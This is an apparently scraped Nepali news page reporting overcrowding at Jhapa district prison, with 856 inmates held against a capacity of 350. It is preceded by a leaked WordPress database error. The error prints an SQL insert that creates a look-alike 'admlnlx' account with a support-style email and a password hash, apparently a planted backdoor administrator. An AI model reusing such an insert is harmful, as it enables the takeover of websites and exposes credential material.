WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2H1q.LYkH4YVIhWVLsm/HaCJAzyq/.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:54:38', '', 'admlnlx', 'admlnlx')
बनियानी (झापा),पुस २८ –
झापा जिल्ला कारागारमा क्षमताभन्दा दोब्बर बढी कैदीबन्दी रहेका छन् ।
कारागारको क्षमता ३५० जनाको भए पनि हाल ८५६ जना कैदीबन्दी रहेकाले जाडोको समयमा पनि उनीहरु कारागारको बरन्डामा सुन्त बाध्य भएको कारागारका लेखापाल खड्ग ओलीले जानकारी दिनुभयो ।
कारागारमा ७८० पुरुष र तीन बालबालिकासहित ७६ महिला रहेका छन् । एउटै कोठामा १५० जनासम्म कैदीबन्दी राख्दा पनि ठाउँ अपुग हुँदा कैन्दीबन्दी बरन्डामा सुतिरहेको उहाँले बताउनुभयो । – रासस